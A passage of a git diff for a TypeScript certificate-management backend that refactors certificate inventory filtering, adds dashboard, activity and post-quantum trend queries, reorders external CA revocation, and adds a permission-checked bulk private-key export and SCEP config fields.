string; + } & TInventoryFilterParams, + permissionFilters?: ProcessedPermissionRules + ) => { + try { + interface CountResult { + count: string; } - if (metadataFilter && metadataFilter.length > 0) { - query = applyMetadataFilter(query, metadataFilter, "certificateId", TableName.Certificate); + let query = db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .join(TableName.Project, `${TableName.CertificateAuthority}.projectId`, `${TableName.Project}.id`) + .where(`${TableName.Project}.id`, projectId); + + const hasEnrollmentTypeFilter = Boolean(filters.enrollmentTypes); + if (hasEnrollmentTypeFilter) { + query = query.leftJoin( + TableName.PkiCertificateProfile, + `${TableName.Certificate}.profileId`, + `${TableName.PkiCertificateProfile}.id` + ); } - if (extendedKeyUsage) { - // PostgreSQL array containment: extendedKeyUsages @> ARRAY['codeSigning']::text[] - query = query.whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, [ - extendedKeyUsage - ]); + query = applyInventoryFilters(query, filters, hasEnrollmentTypeFilter) as typeof query; + + if (permissionFilters) { + query = applyProcessedPermissionRulesToQuery(query, TableName.Certificate, permissionFilters) as typeof query; } const count = await query.count("*").first(); @@ -225,7 +328,7 @@ export const certificateDALFactory = (db: TDbClient) => { }; const findActiveCertificatesForSync = async ( - filter: Partial, + filter: Partial & TInventoryFilterParams>, options?: { limit?: number; offset?: number }, permissionFilters?: ProcessedPermissionRules ): Promise<(TCertificates & { hasPrivateKey: boolean })[]> => { @@ -356,29 +459,37 @@ export const certificateDALFactory = (db: TDbClient) => { } }; + type TCertificateWithInventoryFields = TCertificates & { + hasPrivateKey: boolean; + caName?: string | null; + profileName?: string | null; + enrollmentType?: string | null; + }; + const findWithPrivateKeyInfo = async ( - filter: Partial< - TCertificates & { - friendlyName?: string; - commonName?: string; - search?: string; - status?: string | string[]; - profileIds?: string[]; - fromDate?: Date; - toDate?: Date; - metadataFilter?: Array<{ key: string; value?: string }>; - extendedKeyUsage?: string; - } - >, + filter: Partial & TInventoryFilterParams>, options?: { offset?: number; limit?: number; sort?: [string, "asc" | "desc"][] }, permissionFilters?: ProcessedPermissionRules - ): Promise<(TCertificates & { hasPrivateKey: boolean })[]> => { + ): Promise => { try { let query = db .replicaNode()(TableName.Certificate) .leftJoin(TableName.CertificateSecret, `${TableName.Certificate}.id`, `${TableName.CertificateSecret}.certId`) + .leftJoin( + TableName.CertificateAuthority, + `${TableName.Certificate}.caId`, + `${TableName.CertificateAuthority}.id` + ) + .leftJoin( + TableName.PkiCertificateProfile, + `${TableName.Certificate}.profileId`, + `${TableName.PkiCertificateProfile}.id` + ) .select(selectAllTableCols(TableName.Certificate)) - .select(db.ref(`${TableName.CertificateSecret}.certId`).as("privateKeyRef")); + .select(db.ref(`${TableName.CertificateSecret}.certId`).as("privateKeyRef")) + .select(db.ref("name").withSchema(TableName.CertificateAuthority).as("caName")) + .select(db.ref("slug").withSchema(TableName.PkiCertificateProfile).as("profileName")) + .select(db.ref("enrollmentType").withSchema(TableName.PkiCertificateProfile).as("enrollmentType")); const { friendlyName, @@ -390,6 +501,16 @@ export const certificateDALFactory = (db: TDbClient) => { toDate, metadataFilter, extendedKeyUsage, + keyAlgorithm, + signatureAlgorithm, + keySizes, + caIds, + enrollmentTypes, + source, + notAfterFrom, + notAfterTo, + notBeforeFrom, + notBeforeTo, ...regularFilters } = filter; @@ -399,80 +520,31 @@ export const certificateDALFactory = (db: TDbClient) => { } }); - if (friendlyName) { - const sanitizedValue = sanitizeSqlLikeString(friendlyName); - query = query.andWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - } - - if (commonName) { - const sanitizedValue = sanitizeSqlLikeString(commonName); - query = query.andWhere(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`); - } - - if (search) { - const sanitizedValue = sanitizeSqlLikeString(search); - query = query.andWhere((qb) => { - void qb - .where(`${TableName.Certificate}.commonName`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.altNames`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.serialNumber`, "like", `%${sanitizedValue}%`) - .orWhere(`${TableName.Certificate}.friendlyName`, "like", `%${sanitizedValue}%`); - - if (isUuidV4(sanitizedValue)) { - void qb.orWhere(`${TableName.Certificate}.id`, sanitizedValue); - } - }); - } - - if (status) { - const now = new Date(); - const statuses = Array.isArray(status) ? status : [status]; - - query = query.andWhere((qb) => { - statuses.forEach((statusValue, index) => { - const whereMethod = index === 0 ? "where" : "orWhere"; - - if (statusValue === CertStatus.ACTIVE) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, ">", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else if (statusValue === CertStatus.EXPIRED) { - void qb[whereMethod]((innerQb) => { - void innerQb - .where(`${TableName.Certificate}.notAfter`, "<=", now) - .andWhere(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED); - }); - } else { - void qb[whereMethod](`${TableName.Certificate}.status`, statusValue); - } - }); - }); - } - - if (fromDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, ">=", fromDate); - } - - if (toDate) { - query = query.andWhere(`${TableName.Certificate}.createdAt`, "<=", toDate); - } - - if (profileIds) { - query = query.whereIn(`${TableName.Certificate}.profileId`, profileIds); - } - - if (metadataFilter && metadataFilter.length > 0) { - query = applyMetadataFilter(query, metadataFilter, "certificateId", TableName.Certificate); - } - - if (extendedKeyUsage) { - // PostgreSQL array containment: extendedKeyUsages @> ARRAY['codeSigning']::text[] - query = query.whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, [ - extendedKeyUsage - ]); - } + query = applyInventoryFilters( + query, + { + friendlyName, + commonName, + search, + status, + profileIds, + fromDate, + toDate, + metadataFilter, + extendedKeyUsage, + keyAlgorithm, + signatureAlgorithm, + keySizes, + caIds, + enrollmentTypes, + source, + notAfterFrom, + notAfterTo, + notBeforeFrom, + notBeforeTo + }, + true + ) as typeof query; if (permissionFilters) { query = applyProcessedPermissionRulesToQuery(query, TableName.Certificate, permissionFilters) as typeof query; @@ -486,17 +558,15 @@ export const certificateDALFactory = (db: TDbClient) => { } if (options?.sort) { options.sort.forEach(([column, direction]) => { - query = query.orderBy(column, direction); + query = query.orderBy(`${TableName.Certificate}.${column}`, direction); }); } const results = await query; - return results.map((row) => { - return { - ...row, - hasPrivateKey: row.privateKeyRef !== null - }; - }); + return results.map((row) => ({ + ...row, + hasPrivateKey: row.privateKeyRef !== null + })); } catch (error) { throw new DatabaseError({ error, name: "Find certificates with private key info" }); } @@ -508,7 +578,6 @@ export const certificateDALFactory = (db: TDbClient) => { caType?: "internal" | "external" | null; }; - // Flexible lookup filter for certificate queries - either id or serialNumber, not both type TCertificateLookupFilter = { id: string; serialNumber?: never } | { id?: never; serialNumber: string }; const findWithFullDetails = async ( @@ -516,8 +585,7 @@ export const certificateDALFactory = (db: TDbClient) => { tx?: Knex ): Promise => { try { - let query = (tx || db) - .replicaNode()(TableName.Certificate) + let query = (tx || db.replicaNode())(TableName.Certificate) .leftJoin( TableName.CertificateAuthority, `${TableName.Certificate}.caId`, @@ -538,7 +606,6 @@ export const certificateDALFactory = (db: TDbClient) => { .select(db.ref("slug").withSchema(TableName.PkiCertificateProfile).as("profileName")) .select(db.ref("id").withSchema(TableName.InternalCertificateAuthority).as("internalCaId")); - // Dynamic where clause based on filter if (filter.id) { query = query.where(`${TableName.Certificate}.id`, filter.id); } else { @@ -566,6 +633,378 @@ export const certificateDALFactory = (db: TDbClient) => { } }; + const getDashboardStats = async (projectId: string) => { + try { + const now = new Date(); + const thirtyDaysFromNow = new Date(now.getTime() + 30 * 24 * 60 * 60 * 1000); + + interface TotalsRow { + total: number; + active: number; + expiringSoon: number; + expired: number; + revoked: number; + expiringSoonNoAutoRenewal: number; + expiredNotRenewed: number; + } + + interface LabelCount { + label: string | null; + count: string; + } + + interface LabelCountWithId extends LabelCount { + id: string; + } + + interface BucketCount { + bucket: string; + count: string; + } + + const [totalsRow] = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select( + db.raw("COUNT(*)::int as total"), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" > ? AND "${TableName.Certificate}"."status" != ?)::int as active`, + [now, CertStatus.REVOKED] + ), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" > ? AND "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ?)::int as "expiringSoon"`, + [now, thirtyDaysFromNow, CertStatus.REVOKED] + ), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ?)::int as expired`, + [now, CertStatus.REVOKED] + ), + db.raw(`COUNT(*) FILTER (WHERE "${TableName.Certificate}"."status" = ?)::int as revoked`, [ + CertStatus.REVOKED + ]), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" > ? AND "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ? AND "${TableName.Certificate}"."renewBeforeDays" IS NULL)::int as "expiringSoonNoAutoRenewal"`, + [now, thirtyDaysFromNow, CertStatus.REVOKED] + ), + db.raw( + `COUNT(*) FILTER (WHERE "${TableName.Certificate}"."notAfter" <= ? AND "${TableName.Certificate}"."status" != ? AND "${TableName.Certificate}"."renewedByCertificateId" IS NULL)::int as "expiredNotRenewed"`, + [now, CertStatus.REVOKED] + ) + ); + + const totals = totalsRow as unknown as TotalsRow; + + const byAlgorithm = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select(`${TableName.Certificate}.keyAlgorithm as label`) + .count("* as count") + .groupBy(`${TableName.Certificate}.keyAlgorithm`); + + const byCA = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select(`${TableName.CertificateAuthority}.id as id`) + .select(`${TableName.CertificateAuthority}.name as label`) + .count("* as count") + .groupBy(`${TableName.CertificateAuthority}.id`, `${TableName.CertificateAuthority}.name`); + + const byStatus = [ + { label: "Active", count: totals.active }, + { label: "Expired", count: totals.expired }, + { label: "Revoked", count: totals.revoked } + ]; + + const byEnrollmentMethod = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .leftJoin( + TableName.PkiCertificateProfile, + `${TableName.Certificate}.profileId`, + `${TableName.PkiCertificateProfile}.id` + ) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .select(db.raw(`COALESCE("${TableName.PkiCertificateProfile}"."enrollmentType", 'API') as label`)) + .count("* as count") + .groupBy("label"); + + const sevenDaysFromNow = new Date(now.getTime() + 7 * 24 * 60 * 60 * 1000); + const sixtyDaysFromNow = new Date(now.getTime() + 60 * 24 * 60 * 60 * 1000); + const ninetyDaysFromNow = new Date(now.getTime() + 90 * 24 * 60 * 60 * 1000); + + const expirationBuckets = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED) + .select( + db.raw( + `CASE + WHEN "${TableName.Certificate}"."notAfter" < ? THEN 'expired' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '0-7d' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '8-30d' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '31-60d' + WHEN "${TableName.Certificate}"."notAfter" <= ? THEN '61-90d' + ELSE '90d+' + END as bucket`, + [now, sevenDaysFromNow, thirtyDaysFromNow, sixtyDaysFromNow, ninetyDaysFromNow] + ) + ) + .select(db.raw("count(*)::int as count")) + .groupBy("bucket"); + + const validityBuckets = await db + .replicaNode()(TableName.Certificate) + .where(`${TableName.Certificate}.projectId`, projectId) + .where(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED) + .where(`${TableName.Certificate}.notAfter`, ">", now) + .whereRaw(`"${TableName.Certificate}"."extendedKeyUsages" @> ARRAY[?]::text[]`, ["serverAuth"]) + .select( + db.raw( + `CASE + WHEN EXTRACT(EPOCH FROM ("${TableName.Certificate}"."notAfter" - "${TableName.Certificate}"."notBefore")) / 86400 <= 47 THEN '<=47d' + WHEN EXTRACT(EPOCH FROM ("${TableName.Certificate}"."notAfter" - "${TableName.Certificate}"."notBefore")) / 86400 <= 99 THEN '48-99d' + WHEN EXTRACT(EPOCH FROM ("${TableName.Certificate}"."notAfter" - "${TableName.Certificate}"."notBefore")) / 86400 <= 199 THEN '100-199d' + ELSE '>=200d' + END as bucket` + ) + ) + .select(db.raw("count(*)::int as count")) + .groupBy("bucket"); + + return { + totals: { + total: totals.total, + active: totals.active, + expiringSoon: totals.expiringSoon, + expired: totals.expired, + revoked: totals.revoked + }, + expiringSoonNoAutoRenewal: totals.expiringSoonNoAutoRenewal, + expiredNotRenewed: totals.expiredNotRenewed, + distributions: { + byEnrollmentMethod: (byEnrollmentMethod as unknown as LabelCount[]).map((r) => ({ + label: r.label || "Unknown", + count: Number(r.count) + })), + byAlgorithm: (byAlgorithm as unknown as LabelCount[]).map((r) => ({ + label: r.label || "Unknown", + count: Number(r.count) + })), + byCA: (byCA as unknown as LabelCountWithId[]).map((r) => ({ + id: r.id, + label: r.label || "Unknown", + count: Number(r.count) + })), + byStatus + }, + expirationBuckets: (expirationBuckets as unknown as BucketCount[]).map((r) => ({ + bucket: r.bucket, + count: Number(r.count) + })), + validityBuckets: (validityBuckets as unknown as BucketCount[]).map((r) => ({ + bucket: r.bucket, + count: Number(r.count) + })) + }; + } catch (error) { + throw new DatabaseError({ error, name: "Get dashboard stats" }); + } + }; + + const getActivityTrend = async (projectId: string, daysBack: number) => { + try { + const startDate = new Date(); + startDate.setDate(startDate.getDate() - daysBack); + startDate.setHours(0, 0, 0, 0); + const now = new Date(); + + const useDaily = daysBack <= 30; + + if (!useDaily) { + startDate.setDate(1); + } + const truncUnit = useDaily ? "day" : "month"; + const dateFormat = useDaily ? "YYYY-MM-DD" : "YYYY-MM"; + + const periodExpr = (col: string) => + db.raw(`to_char(date_trunc(?, "${TableName.Certificate}"."${col}"), ?) as period`, [truncUnit, dateFormat]); + + const issued = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.notBefore`, ">=", startDate) + .where(`${TableName.Certificate}.notBefore`, "<=", now) + .select(periodExpr("notBefore")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const expired = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.notAfter`, ">=", startDate) + .where(`${TableName.Certificate}.notAfter`, "<=", now) + .where(`${TableName.Certificate}.status`, "!=", CertStatus.REVOKED) + .select(periodExpr("notAfter")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const revoked = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.status`, CertStatus.REVOKED) + .where(`${TableName.Certificate}.revokedAt`, ">=", startDate) + .where(`${TableName.Certificate}.revokedAt`, "<=", now) + .select(periodExpr("revokedAt")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const renewed = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .whereNotNull(`${TableName.Certificate}.renewedFromCertificateId`) + .where(`${TableName.Certificate}.notBefore`, ">=", startDate) + .where(`${TableName.Certificate}.notBefore`, "<=", now) + .select(periodExpr("notBefore")) + .select(db.raw("count(*)::int as count")) + .groupBy("period") + .orderBy("period"); + + const periods: Array<{ + period: string; + issued: number; + expired: number; + revoked: number; + renewed: number; + }> = []; + interface PeriodCount { + period: string; + count: string; + } + + const typedIssued = issued as unknown as PeriodCount[]; + const typedExpired = expired as unknown as PeriodCount[]; + const typedRevoked = revoked as unknown as PeriodCount[]; + const typedRenewed = renewed as unknown as PeriodCount[]; + + const issuedMap = new Map(typedIssued.map((r) => [r.period, r.count])); + const expiredMap = new Map(typedExpired.map((r) => [r.period, r.count])); + const revokedMap = new Map(typedRevoked.map((r) => [r.period, r.count])); + const renewedMap = new Map(typedRenewed.map((r) => [r.period, r.count])); + + const cursor = new Date(startDate); + while (cursor <= now) { + let periodKey: string; + if (useDaily) { + periodKey = `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}-${String(cursor.getDate()).padStart(2, "0")}`; + } else { + periodKey = `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}`; + } + const issuedCount = issuedMap.get(periodKey); + const expiredCount = expiredMap.get(periodKey); + const revokedCount = revokedMap.get(periodKey); + const renewedCount = renewedMap.get(periodKey); + periods.push({ + period: periodKey, + issued: issuedCount ? Number(issuedCount) : 0, + expired: expiredCount ? Number(expiredCount) : 0, + revoked: revokedCount ? Number(revokedCount) : 0, + renewed: renewedCount ? Number(renewedCount) : 0 + }); + if (useDaily) { + cursor.setDate(cursor.getDate() + 1); + } else { + cursor.setMonth(cursor.getMonth() + 1); + } + } + + return { periods }; + } catch (error) { + throw new DatabaseError({ error, name: "Get activity trend" }); + } + }; + + const getPqcTrend = async (projectId: string, daysBack: number) => { + try { + const startDate = new Date(); + startDate.setDate(startDate.getDate() - daysBack); + startDate.setHours(0, 0, 0, 0); + const now = new Date(); + + const useDaily = daysBack <= 30; + if (!useDaily) { + startDate.setDate(1); + } + const truncUnit = useDaily ? "day" : "month"; + const dateFormat = useDaily ? "YYYY-MM-DD" : "YYYY-MM"; + + const rows = await db + .replicaNode()(TableName.Certificate) + .join(TableName.CertificateAuthority, `${TableName.Certificate}.caId`, `${TableName.CertificateAuthority}.id`) + .where(`${TableName.CertificateAuthority}.projectId`, projectId) + .where(`${TableName.Certificate}.notBefore`, ">=", startDate) + .where(`${TableName.Certificate}.notBefore`, "<=", now) + .whereIn(`${TableName.Certificate}.keyAlgorithm`, [...PQC_KEY_ALGORITHMS, ...NON_PQC_KEY_ALGORITHMS]) + .select( + db.raw(`to_char(date_trunc(?, "${TableName.Certificate}"."notBefore"), ?) as period`, [truncUnit, dateFormat]) + ) + .select( + db.raw( + `CASE WHEN "${TableName.Certificate}"."keyAlgorithm" IN (${PQC_KEY_ALGORITHMS.map(() => "?").join(",")}) THEN 'pqc' ELSE 'nonPqc' END as bucket`, + [...PQC_KEY_ALGORITHMS] + ) + ) + .select(db.raw("count(*)::int as count")) + .groupBy("period", "bucket") + .orderBy("period"); + + interface PeriodBucketCount { + period: string; + bucket: "pqc" | "nonPqc"; + count: string; + } + const typed = rows as unknown as PeriodBucketCount[]; + const pqcMap = new Map(); + const nonPqcMap = new Map(); + typed.forEach((r) => { + if (r.bucket === "pqc") pqcMap.set(r.period, Number(r.count)); + else nonPqcMap.set(r.period, Number(r.count)); + }); + + const periods: Array<{ period: string; pqc: number; nonPqc: number }> = []; + const cursor = new Date(startDate); + while (cursor <= now) { + const periodKey = useDaily + ? `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}-${String(cursor.getDate()).padStart(2, "0")}` + : `${cursor.getFullYear()}-${String(cursor.getMonth() + 1).padStart(2, "0")}`; + periods.push({ + period: periodKey, + pqc: pqcMap.get(periodKey) ?? 0, + nonPqc: nonPqcMap.get(periodKey) ?? 0 + }); + if (useDaily) { + cursor.setDate(cursor.getDate() + 1); + } else { + cursor.setMonth(cursor.getMonth() + 1); + } + } + + return { periods }; + } catch (error) { + throw new DatabaseError({ error, name: "Get PQC trend" }); + } + }; + return { ...certificateOrm, countCertificatesInProject, @@ -578,6 +1017,9 @@ export const certificateDALFactory = (db: TDbClient) => { findActiveCertificatesForSync, findCertificatesEligibleForRenewal, findWithPrivateKeyInfo, - findWithFullDetails + findWithFullDetails, + getDashboardStats, + getActivityTrend, + getPqcTrend }; }; diff --git a/backend/src/services/certificate/certificate-fns.ts b/backend/src/services/certificate/certificate-fns.ts index 5441bd615d7..19dde4fae07 100644 --- a/backend/src/services/certificate/certificate-fns.ts +++ b/backend/src/services/certificate/certificate-fns.ts @@ -8,6 +8,7 @@ import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { parseDistinguishedName } from "../certificate-authority/certificate-authority-fns"; import { getProjectKmsCertificateKeyId } from "../project/project-fns"; import { + CertKeyAlgorithm, CrlReason, TCertificateFingerprints, TCertificateSubject, @@ -15,6 +16,18 @@ import { TParsedCertificateBody } from "./certificate-types"; +export const keySizeToAlgorithms = (keySize: number): string[] => { + const map: Record = { + 2048: [CertKeyAlgorithm.RSA_2048], + 3072: [CertKeyAlgorithm.RSA_3072], + 4096: [CertKeyAlgorithm.RSA_4096], + 256: [CertKeyAlgorithm.ECDSA_P256], + 384: [CertKeyAlgorithm.ECDSA_P384], + 521: [CertKeyAlgorithm.ECDSA_P521] + }; + return map[keySize] ?? []; +}; + export const revocationReasonToCrlCode = (crlReason: CrlReason) => { switch (crlReason) { case CrlReason.KEY_COMPROMISE: diff --git a/backend/src/services/certificate/certificate-service.ts b/backend/src/services/certificate/certificate-service.ts index 0c50497be8a..2c0a6c2920e 100644 --- a/backend/src/services/certificate/certificate-service.ts +++ b/backend/src/services/certificate/certificate-service.ts @@ -388,6 +388,20 @@ export const certificateServiceFactory = ({ if (cert.status === CertStatus.REVOKED) throw new Error("Certificate already revoked"); + // Call the upstream CA first so we don't end up with a cert that's revoked locally but still + // active at the issuer (e.g., when the upstream rejects the chosen revocation reason). + if ( + ca.externalCa?.type === CaType.AWS_PCA || + ca.externalCa?.type === CaType.AWS_ACM_PUBLIC_CA || + ca.externalCa?.type === CaType.DIGICERT + ) { + await certificateAuthorityService.revokeCertificate({ + caId: ca.id, + serialNumber: cert.serialNumber, + reason: revocationReason + }); + } + const revokedAt = new Date(); await certificateDAL.update( { @@ -407,17 +421,6 @@ export const certificateServiceFactory = ({ pkiSyncQueue }); - // Note: External CA revocation handling would go here for supported CA types - // Currently, only internal CAs, ACME CAs and AWS PCA (external CA) support revocation - - if (ca.externalCa?.type === CaType.AWS_PCA) { - await certificateAuthorityService.revokeCertificate({ - caId: ca.id, - serialNumber: cert.serialNumber, - reason: revocationReason - }); - } - // rebuild CRL (TODO: move to interval-based cron job) // Only rebuild CRL for internal CAs - external CAs manage their own CRLs if (!ca.externalCa?.id) { diff --git a/backend/src/services/cmek/cmek-service.ts b/backend/src/services/cmek/cmek-service.ts index 2acc95ee6d9..0a176ebf212 100644 --- a/backend/src/services/cmek/cmek-service.ts +++ b/backend/src/services/cmek/cmek-service.ts @@ -3,11 +3,12 @@ import { ForbiddenError } from "@casl/ability"; import { ActionProjectType } from "@app/db/schemas"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionCmekActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; -import { SigningAlgorithm } from "@app/lib/crypto/sign"; +import { AsymmetricKeyAlgorithm, SigningAlgorithm, signingService } from "@app/lib/crypto/sign"; import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; import { OrgServiceActor } from "@app/lib/types"; import { + TCmekBulkGetPrivateKeysDTO, TCmekDecryptDTO, TCmekEncryptDTO, TCmekGetPrivateKeyDTO, @@ -318,6 +319,79 @@ export const cmekServiceFactory = ({ kmsService, kmsDAL, permissionService }: TC }; }; + const bulkGetPrivateKeys = async ({ keyIds }: TCmekBulkGetPrivateKeysDTO, actor: OrgServiceActor) => { + if (keyIds.length === 0) throw new BadRequestError({ message: "At least one key ID is required" }); + + const uniqueKeyIds = [...new Set(keyIds)]; + const keys = await kmsDAL.findCmeksByIds(uniqueKeyIds); + + if (keys.length === 0) throw new NotFoundError({ message: "No keys found for the provided IDs" }); + + if (keys.length !== uniqueKeyIds.length) { + const foundIds = new Set(keys.map((k) => k.id)); + const missingIds = uniqueKeyIds.filter((id) => !foundIds.has(id)); + throw new NotFoundError({ message: `Keys not found for IDs: ${missingIds.join(", ")}` }); + } + + const projectIds = new Set(); + for (const key of keys) { + if (!key.projectId || key.isReserved) + throw new BadRequestError({ message: `Key with ID "${key.id}" is not customer managed` }); + if (key.isDisabled) throw new BadRequestError({ message: `Key with ID "${key.id}" is disabled` }); + projectIds.add(key.projectId); + } + + if (projectIds.size > 1) throw new BadRequestError({ message: "All keys must belong to the same project" }); + + const projectId = keys[0].projectId!; + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorId: actor.id, + projectId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + actionProjectType: ActionProjectType.KMS + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionCmekActions.ExportPrivateKey, + ProjectPermissionSub.Cmek + ); + + const bulkMaterials = await kmsService.getBulkKeyMaterial({ kmsIds: keys.map((k) => k.id) }); + + const materialByKmsId = new Map(bulkMaterials.map((m) => [m.kmsId, m])); + const asymmetricAlgorithms = new Set(Object.values(AsymmetricKeyAlgorithm)); + + const result = keys.map((key) => { + const materialEntry = materialByKmsId.get(key.id); + + if (!materialEntry) { + throw new NotFoundError({ message: `Key material not found for key ID "${key.id}"` }); + } + + let publicKey: string | undefined; + if (asymmetricAlgorithms.has(key.encryptionAlgorithm)) { + const pubKeyBuffer = signingService( + key.encryptionAlgorithm as AsymmetricKeyAlgorithm + ).getPublicKeyFromPrivateKey(materialEntry.keyMaterial); + publicKey = pubKeyBuffer.toString("base64"); + } + + return { + keyId: key.id, + name: key.name, + keyUsage: key.keyUsage, + algorithm: key.encryptionAlgorithm, + privateKey: materialEntry.keyMaterial.toString("base64"), + ...(publicKey ? { publicKey } : {}) + }; + }); + + return { keys: result, projectId }; + }; + const cmekSign = async ({ keyId, data, signingAlgorithm, isDigest }: TCmekSignDTO, actor: OrgServiceActor) => { const key = await kmsDAL.findCmekById(keyId); @@ -432,6 +506,7 @@ export const cmekServiceFactory = ({ kmsService, kmsDAL, permissionService }: TC cmekVerify, listSigningAlgorithms, getPublicKey, - getPrivateKey + getPrivateKey, + bulkGetPrivateKeys }; }; diff --git a/backend/src/services/cmek/cmek-types.ts b/backend/src/services/cmek/cmek-types.ts index eafd39e39fa..d1b3267182c 100644 --- a/backend/src/services/cmek/cmek-types.ts +++ b/backend/src/services/cmek/cmek-types.ts @@ -57,6 +57,10 @@ export type TCmekGetPrivateKeyDTO = { keyId: string; }; +export type TCmekBulkGetPrivateKeysDTO = { + keyIds: string[]; +}; + export type TCmekSignDTO = { keyId: string; data: string; diff --git a/backend/src/services/enrollment-config/enrollment-config-types.ts b/backend/src/services/enrollment-config/enrollment-config-types.ts index badf981a17a..afc31220b99 100644 --- a/backend/src/services/enrollment-config/enrollment-config-types.ts +++ b/backend/src/services/enrollment-config/enrollment-config-types.ts @@ -52,7 +52,10 @@ export type TScepEnrollmentConfigInsert = TPkiScepEnrollmentConfigsInsert; export type TScepEnrollmentConfigUpdate = TPkiScepEnrollmentConfigsUpdate; export interface TScepConfigData { - challengePassword: string; + challengeType?: string; + challengePassword?: string; includeCaCertInResponse?: boolean; allowCertBasedRenewal?: boolean; + dynamicChallengeExpiryMinutes?: number; + dynamicChallengeMaxPending?: number; } diff --git a/backend/src/services/external-migration/external-migration-config-dal.ts b/backend/src/services/external-migration/external-migration-config-dal.ts new file mode 100644 index 00000000000..1f0d11361d0 --- /dev/null +++ b/backend/src/services/external-migration/external-migration-config-dal.ts @@ -0,0 +1,92 @@ +import { Knex } from "knex"; + +import { TDbClient } from "@app/db"; +import { TableName, TExternalMigrationConfigs } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { buildFindFilter, ormify, prependTableNameToFindFilter, selectAllTableCols } from "@app/lib/knex"; + +export type TExternalMigrationConfigDALFactory = ReturnType; + +const buildConnectionJoin = (qb: Knex.QueryBuilder, db: TDbClient) => + qb + .leftJoin( + TableName.AppConnection, + `${TableName.AppConnection}.id`, + `${TableName.ExternalMigrationConfig}.connectionId` + ) + .select(selectAllTableCols(TableName.ExternalMigrationConfig)) + .select( + db.ref("id").withSchema(TableName.AppConnection).as("appConnectionId"), + db.ref("name").withSchema(TableName.AppConnection).as("appConnectionName"), + db.ref("app").withSchema(TableName.AppConnection).as("appConnectionApp"), + db.ref("encryptedCredentials").withSchema(TableName.AppConnection).as("appConnectionEncryptedCredentials"), + db.ref("orgId").withSchema(TableName.AppConnection).as("appConnectionOrgId"), + db.ref("isAutoRotationEnabled").withSchema(TableName.AppConnection).as("appConnectionIsAutoRotationEnabled"), + db.ref("method").withSchema(TableName.AppConnection).as("appConnectionMethod"), + 